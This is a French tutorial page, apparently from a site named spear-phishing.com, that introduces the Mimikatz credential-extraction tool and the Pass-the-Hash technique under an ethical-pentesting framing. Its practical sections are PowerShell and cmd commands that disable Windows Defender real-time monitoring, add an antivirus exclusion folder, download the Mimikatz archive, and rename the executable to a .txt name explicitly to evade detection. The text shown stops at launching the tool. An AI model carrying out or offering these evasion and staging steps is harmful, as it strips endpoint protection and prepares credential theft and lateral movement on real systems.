Pass-the-Hash

Concepts essentiels à comprendre :

Mimikatz se présente comme un outil d'analyse de sécurité aux capacités étendues, capable de révéler avec précision les vulnérabilités au sein des systèmes d'information. Il offre une analyse approfondie et détaillée, facilitant ainsi l'identification et la correction des failles de sécurité. Sa flexibilité permet aux utilisateurs de personnaliser les commandes selon leurs besoins, rendant Mimikatz inestimable pour renforcer les défenses des infrastructures informatiques.

L'intégration de Mimikatz dans différents flux de travail de sécurité et sa capacité à accélérer le processus d'audit et la réactivité aux incidents le distinguent comme un outil puissant pour les professionnels de la cybersécurité. Cette introduction cadre l'utilisation de la technique "Pass-the-Hash", démontrant l'une des nombreuses applications pratiques de Mimikatz pour l'évaluation et l'amélioration de la sécurité des systèmes.

Mimikatz

2.0 - Pass-the-Hash

Dans cet aperçu, nous allons nous concentrer sur Mimikatz, un outil central dans le domaine des tests de pénétration et de la cybersécurité. Nous mettrons en lumière l'utilisation éthique et légale de Mimikatz, tout en introduisant spécifiquement la technique "Pass-the-Hash". Cette méthode, cruciale pour évaluer la sécurité des systèmes, illustre parfaitement comment Mimikatz peut être utilisé pour identifier et renforcer les vulnérabilités liées à la gestion des identifiants.

Hannah Swann mimikatz/mimikatz ParrotSec

Explication : La technique Pass-the-Hash permet aux attaquants d'accéder aux systèmes en utilisant le hash du mot de passe d'un utilisateur au lieu du mot de passe en clair. Cela permet une authentification non autorisée sans nécessiter la connaissance du mot de passe réel, facilitant les déplacements latéraux à travers un réseau. La prévention de telles attaques repose sur des mesures de sécurité avancées, comme l'authentification multi-facteurs et une surveillance rigoureuse des accès.

Exclusivement sur : spear-phishing.com Plus de détails

Mimikatz

2.1 Préparation

Pour utiliser Mimikatz sous Windows, une installation manuelle du logiciel est indispensable.Par ailleurs, afin de mener à bien vos activités avec Mimikatz sans interruption, il sera nécessaire de désactiver temporairement Windows Defender. Cette étape garantit que le logiciel peut opérer sans être entravé par les mesures de sécurité intégrées.

Important : Mimikatz est un outil critique en cybersécurité, spécialisé dans l'extraction de données d'authentification sur Windows, comme les mots de passe et hashes. Utilisé pour les tests de pénétration, il révèle les vulnérabilités des systèmes pour améliorer leur sécurité.

mimikatz_trunkk.zip

        
Set-MpPreference -DisableRealtimeMonitoring $true

        
New-Item -Path "C:\mimikatz" -ItemType Directory -Force

        
Add-MpPreference -ExclusionPath "C:\mimikatz"

Astuce : Pour les pentesters, l'utilisation de BloodHound pour cartographier les relations de confiance dans un Active Directory peut révéler des comptes privilégiés vulnérables au Pass-the-Hash, guidant ainsi vers des cibles de sécurisation prioritaires.

Plus de détails

        
Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -OutFile "C:\mimikatz\mimikatz_trunk.zip"

        
cd C:\mimikatz\

        
Expand-Archive -Path "C:\mimikatz\mimikatz_trunk.zip" -DestinationPath "C:\mimikatz\mimikatz_trunk"

Mimikatz

2.2 - Passage en Mode Furtif pour Contourner les Détections

Pour éviter les ralentissements causés par les programmes de sécurité, nous activons le mode furtif. Nous nous déplaçons dans le répertoire approprié et renommons l'exécutable pour éviter toute détection.


        
cd C:\mimikatz\mimikatz_trunk\x64

        
ren mimikatz.exe DumpStack.txt

Mimikatz

2.3 - Lancement de Mimikatz

Pour initier l'utilisation de Mimikatz et commencer l'analyse de sécurité, la première action à réaliser est d'exécuter le logiciel. Après avoir navigué dans le dossier mimikatz_trunk\x64 où Mimikatz est situé, tapez mimikatz.exe ou DumpStack.txt dans votre invite de commande pour démarrer l'application.